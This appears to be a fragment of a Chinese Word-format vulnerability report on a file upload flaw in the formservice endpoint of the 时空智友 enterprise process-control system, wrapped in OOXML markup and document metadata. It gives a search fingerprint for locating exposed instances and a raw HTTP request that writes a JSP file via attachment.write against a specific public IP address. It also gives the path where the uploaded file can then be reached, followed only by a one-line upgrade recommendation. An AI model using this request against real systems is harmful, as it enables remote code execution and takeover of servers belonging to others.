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t>时空智友企业流程化管控系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:t>敏感信息泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞时空智友企业流程化管控系统 formservice 文件上传漏洞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时空智友企业流程化管控系统是使用JAVA开发为企业提供流程化管控的一款系统。时空智友企业流程化管控系统 formservice 文件上传漏洞,攻击者可利用该漏洞获取系统权限等.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body="企业流程化管控系统"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211455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部分界面如下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2583815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 /formservice?service=attachment.write&amp;isattach=false&amp;filename=1.jsp HTTP/1.1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Host: 223.71.66.209:86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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15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Content-Length: 4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98770" cy="2774315"/>
            <wp:effectExtent l="0" t="0" r="11430" b="146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774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访问如下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/form/temp/202311105aalfj6adume5b32_1.jsp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60365" cy="3083560"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1016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0365" cy="3083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1、升级到安全版本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12985E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5D12985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1F4466F6"/>
    <w:rsid w:val="210F4A8E"/>
    <w:rsid w:val="3CF32B54"/>
    <w:rsid w:val="417D4045"/>
    <w:rsid w:val="6E77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2023-11-12T05:44:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-12T07:27:53Z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796BC22A595F4B26BB96AAE0FABD1B28_12</vt:lpwstr>
  </property>
</Properties>
</file>